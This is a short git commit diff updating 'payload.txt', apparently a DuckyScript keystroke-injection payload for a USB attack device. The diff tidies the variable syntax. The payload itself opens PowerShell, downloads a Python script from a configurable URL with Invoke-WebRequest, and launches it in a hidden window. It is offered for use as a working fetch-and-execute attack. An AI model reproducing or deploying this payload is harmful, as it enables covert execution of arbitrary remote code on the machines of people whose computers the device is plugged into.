Update payload.txt

pull/169/head
Kalani Helekunihi 2023-06-12 14:06:13 -04:00 committed by GitHub
parent 085e2e4ab1
commit 8a321bf5bd
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 2 additions and 5 deletions

View File

@ -13,7 +13,7 @@ REM Requirements:
REM - Internet Connection
REM REQUIRED - Set your Python script link
DEFINE SCRIPT-PY-LINK example.com
DEFINE #SCRIPT-PY-LINK example.com
DELAY 1000
@ -23,10 +23,7 @@ STRING powershell
ENTER
DELAY 500
STRING Invoke-WebRequest -Uri "
STRING SCRIPT-PY-LINK
STRING " -OutFile "script.py"
ENTER
STRINGLN Invoke-WebRequest -Uri "#SCRIPT-PY-LINK" -OutFile "script.py"
DELAY 500
STRINGLN Start-Process python.exe -ArgumentList "script.py" -WindowStyle Hidden